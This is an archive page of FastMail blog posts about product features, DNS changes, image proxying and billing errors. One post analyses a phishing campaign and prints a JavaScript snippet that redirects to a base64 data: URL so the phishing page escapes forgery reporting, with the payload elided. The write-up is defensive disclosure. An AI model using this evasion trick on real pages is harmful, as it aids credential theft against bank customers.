New anti-phishing feature, all official FastMail emails have green tick mark

We’ve just rolled out a new feature that should help users identify official FastMail emails and avoid fake phishing emails.

All future official FastMail emails should now have a green tick next to them in the mailbox listing and when viewing the email/conversation. They look like this:

Screen Shot 2014-10-14 at 10.14.37 pm

Screen Shot 2014-10-14 at 10.17.52 pm

Users should be careful of any future emails that claim to be from FastMail that don’t have the green tick. These are almost certainly phishing emails that aim to steal your login details. Just report them as spam.

Note that the tick will only appear on future official FastMail emails, not existing ones. Also it only appears in the current web interface, not the classic web interface and not in external email clients (e.g. Outlook, Thunderbird, Mac Mail, etc)

Posted in News. Comments Off

FastMail changelog update

The following changes have been rolled out to production:

  • When you use FastMail’s nameservers for your DNS, one of the default records we publish is an SPF
    record. Until now, we’ve published this as a TXT DNS record type and a SPF DNS record type type.
  • SPF DNS record types have been deprecated (http://tools.ietf.org/html/rfc7208#section-3.1) for a while, so we’ve now removed the SPF DNS record type and are only publishing TXT DNS records types.
  • This shouldn’t affect anyone, but we’ve put up this post as informational for anyone experiencing some
    issue with ancient software or systems.
Posted in Feature announcement. Comments Off

Better security and privacy through image proxying

Today we rolled out a feature that enhances your privacy and security when you use FastMail: all off-site images embedded in emails are now proxied through our servers. Instead of your web browser going out to the wider internet to fetch an image in an email, it will request it securely from our servers and we’ll fetch the image on your behalf. (The original email is never modified, so if you forward it or view it in an IMAP client, it will appear exactly as we received it.)

When your browser requests an image (or any other page) it sends all sorts of information to the web server, including your internet address (which reveals your rough location), the type and version of browser you’re using, and sometimes even tracking cookies and other information that can help identify you. While these things are a fundamental part of how the web works and are difficult to avoid, we know that many of our users don’t like this information to be sent without their knowledge. That’s why we’ve always had protection against this by requiring you to explicitly request that images be loaded for an email.

Now though, we’ve gone one step further. When an image is loaded, the request goes only to our servers, which then go and request the original image. The request comes from the server’s address, with a generic browser type and version and no information at all that identifies the original email or the user requesting it. The image server remains in the dark about where the request came from. That’s a big plus for your privacy.

The other advantage of our new approach is that it removes the possibility of mixed-content warnings appearing in your browser while reading your email. Every web user has had it drilled into them for years that they should look for the padlock icon to know if the site they’re looking at is secure:

happy-proxy

But when you view an email with an image served from an insecure site (as most image hosting sites are), the browser changes the padlock icon to look like this:

sad-proxy

Since all images now come via our secure servers, the padlock will now always remain intact, giving you the confidence that no one is intercepting your data.

Edit: Clarified that the image server cannot see where the request came from. It may still be able to determine who the request came (ie email address validation) if the image URL has some kind of tracking data in it. Its still a marked improvement on not proxying at all, as it can’t be directly correlated with an internet address or other tracking data.

Posted in Feature announcement, News. Comments Off

FastMail changelog update

The following changes have been rolled out to production:

  • New keyboard shortcut: ";" (semi-colon) opens the "More" menu of a message. You can then use arrow keys + enter to select an option. Use N/P to select a message before the last one in a conversation. More information on keyboard shortcuts is available in our documentation: https://www.fastmail.fm/help/receive/kbshortcuts.html
Posted in Feature announcement. Comments Off

Payment Issues

Recently there have been some problems with our payment processor.

One of these is that sometimes there is a significant delay in completing a transaction, so the funds are “reserved” but the transaction isn’t actually completed until a few weeks later.

The other problem was that a number of charges were made to some of our customers’ credit cards, in our name. The majority of these are USD 1.00 test charges that are used to verify that a card is valid. Normally we cancel these charges immediately and the charge doesn’t appear on the card statement. However the problem at our payment processor has resulted in some of these supposedly “cancelled” charges recently being applied to customer cards. A number of other charges which were supposed to be “cancelled” have also been processed. This was done in error and without any instructions from FastMail.

We are currently working with our payment processor to refund these erroneous payments. In some cases, the refunds are unable to be processed directly because the card has expired or been cancelled.

We may need to refund these charges via an alternative method, or, at the user’s option, instead credit the amount towards future FastMail renewals. We will be in touch with the affected customers once we have more information on the scope of the problem.

We would like to assure our users that we will make certain that all erroneous charges are corrected. This may take some time, so thanks for your patience.

Our apologies for any inconvenience or confusion. We will post more information as it becomes available.
- the FastMail team

Posted in Technical. Comments Off

New phishing trick, data: URLs to avoid forgery reporting

This is a technical post about a new and interesting phishing technique seen today. Regular FastMail users can skip this post.

We saw an interesting new phishing attempt today that uses a relatively novel technique to try and hide the source of the attack and avoid it being reported as a web forgery.

Firstly the email itself looks reasonably well done (apart from the year in the subject being completely wrong), certainly it’s not the poor quality you often see. It looked like this (ANZ is an Australian bank):

phishing

Secondly, the email was sent using a compromised gmail account with a .edu address. In fact there were two separate emails, both from different compromised gmail .edu accounts. I imagine compromised gmail .edu accounts aren’t that easy to get, and this significantly reduced the chances of it being caught by any spam filter.

Thirdly, the phishing page itself is interesting in that it:

  1. Uses a standard link shortener for a redirect (http://ow.ly in this case)
  2. Which redirects to the phishing delivery page (a compromised page on http://zerra-performance-center.de)
  3. That page however rather than hosting the HTML phishing login page directly, does this:

<script type="text/javascript">
        window.location="data:text/html;base64,... base64 encoded version of HTML phishing login page ...";
</script>

That data: URL is itself the phishing page content, which includes links to real ANZ website logos to make it look as authentic as possible, but has a form submit action to a compromised page on http://lucinaracosta.com.br.

This approach is interesting because it makes it impossible to report this page as a forgery using the standard Firefox "Report Web Forgery" action because Firefox thinks it’s a data: URL. Neat trick that makes it harder to remove or block in the long run.

I’ve reported this issue as a Firefox bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1032564

Posted in Technical. Comments Off

Announcing the FastMail Calendar

After 9 months of intense work, we’re very proud to announce a major new addition to FastMail. We’ve taken all the great things about FastMail’s email hosting and applied them to build an awesome new calendar. You get the same incredibly speedy and elegant web interface. The same robust, fully-redundant backend (with live off-shore replicas). The same power behind an easy-to-use interface.

Our new calendar is packed full of the features you need to stay organised:

  • Continuous scrolling, because life isn’t broken into months.
  • Two-way sync with your existing Google or iCloud calendars.
  • A great experience on mobile browsers – just like with email.
  • Real-time updates, so changes are displayed immediately on all devices.
  • Multiple time zone support.
  • Powerful sharing options for easy collaboration.

We could go on, but really you should just try it for yourself. Head over to https://www.fastmail.fm and log in to your account, or if you don’t yet have one you can sign up for a free 60-day trial. Alternatively, find out more about what our new calendar can do by exploring our documentation.

A major addition like this would often be added as a separate service, but we’re delighted to announce that the new calendar will be available at no extra cost for all our paying subscribers. Most accounts also get CalDAV access included as well for syncing with your favourite mobile calendar app. More information about which accounts have CalDAV access
is available on our new pricing pages.

With contact synchronisation coming very soon now, we’re looking forward to meeting all your communication needs in one place.

We hope you enjoy using our new calendar as much we’ve enjoyed building it. As always, we’d love to hear what you think! Please let us know via support, twitter, etc.

The FastMail Team

Posted in News. Comments Off
Follow

Get every new post delivered to your Inbox.

Join 5,716 other followers